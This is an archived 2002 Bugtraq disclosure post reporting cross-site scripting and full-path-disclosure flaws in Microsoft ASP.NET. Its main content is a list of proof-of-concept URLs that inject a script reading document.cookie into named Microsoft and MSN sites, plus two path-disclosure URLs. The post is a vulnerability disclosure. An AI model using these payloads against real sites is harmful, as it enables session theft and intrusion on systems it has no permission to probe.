[24109] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Microsoft .NET faults

daemon@ATHENA.MIT.EDU (Johannes Westerink)
Mon Feb 4 20:18:27 2002

Cc: recipient list not shown: ;recipient list not shown:;@MIT.EDU
Date: Mon, 4 Feb 2002 22:40:31 +0100
Message-Id: <200202042140.g14LdMO14502@mail.daxis.nl>
From: "Johannes Westerink" <jwesterink@daxis.nl>

Microsoft ASP.NET Cross Site Scripting and Full Path Disclosure vulnerability

This is based on Microsoft .NET.




Examples how it can be exploited:

Cross Site Scripting:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://ulogin.bcentral.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://www.msn.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://my.msn.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://dotnet.microsoft.com/<script>alert(document.cookie)</script>.aspx
http://terraserver.microsoft.net/<script>alert(document.cookie)</script>.aspx
http://support.microsoft.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://office.microsoft.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://communities.microsoft.com/~/<script>alert(document.cookie)</script>.aspx
http://uddi.microsoft.com/~/<script>alert(document.cookie)</script>.aspx



This vulnerability exists on older .NET versions:

Full Path Disclosure vulnerability:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://terraserver.microsoft.com/a%5c.aspx
http://uddi.microsoft.com/a%5c.aspx



I've posted via Microsoft security subscribe website  that there is a vulnerability and how to exploit on one of their site long times ago (1/2 year ago), and haven't got any response of them.


-- Johannes Westerink


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[24109] in bugtraq

Microsoft .NET faults

daemon@ATHENA.MIT.EDU (Johannes Westerink)Mon Feb 4 20:18:27 2002

daemon@ATHENA.MIT.EDU (Johannes Westerink)
Mon Feb 4 20:18:27 2002